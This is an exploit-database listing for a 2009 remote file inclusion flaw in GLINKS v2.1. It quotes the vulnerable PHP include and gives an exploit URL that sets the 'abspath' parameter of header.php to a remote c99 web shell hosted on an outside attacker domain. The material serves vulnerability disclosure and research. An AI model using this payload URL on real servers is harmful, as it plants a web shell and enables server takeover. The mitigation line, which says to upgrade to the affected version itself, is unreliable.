header-logo
Suggest Exploit
vendor:
GLINKS
by:
k3vin mitnick
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: GLINKS
Affected Version From: GLINKS v2.1
Affected Version To: GLINKS v2.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GLINKS v2.1 Remote File Include Vulnerability

GLINKS v2.1 is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a malicious URL in the 'abspath' parameter of the 'header.php' script. This malicious URL can be used to include a remote file containing arbitrary malicious code which will be executed by the vulnerable server.

Mitigation:

Upgrade to the latest version of GLINKS v2.1 or later.
Source

Exploit-DB raw data:

#########################################################
# GLINKS v2.1 Remote File Include Vulnerability
# http://www.groonesworld.com/programs/glinks/glinks.zip
# 
#========================================================
# Author: k3vin mitnick( tunisianblackhat team ) =
# 
# Home : http://tunisianblackhat.com & scarface-team.org =
# 
# email: kevinmitnick[A]live.fr = web-terrorist@mail.ru =
# 
#=========================================================
#
#        bug : <style type="text/css">
#                      <?php include($abspath.'/css/style.inc'); ?>
#                </style>
# 
# exploit   :
#  http://localhost/glinks/includes/header.php?abspath=http://www.evilc0der.com/c99.txt?
#
#
#
##########################################################
>
 .:: Tunisian Blackhat team work with scarface-team many suprise as soon ::.
>


> ########################( Greetz )###########################
# scarface-team mrabah12R feyiz marw?-neo  samy chelly
# hug, pelo, iskorpitx , ByalBayx crackerz-Team,milw0rm.com
# C4TEAM & c4team.org & snap and all
# tunisian hackers #
#
#
#
> #############################################################

# milw0rm.com [2009-02-03]

Navigation

Suggest Exploit

Services By CQR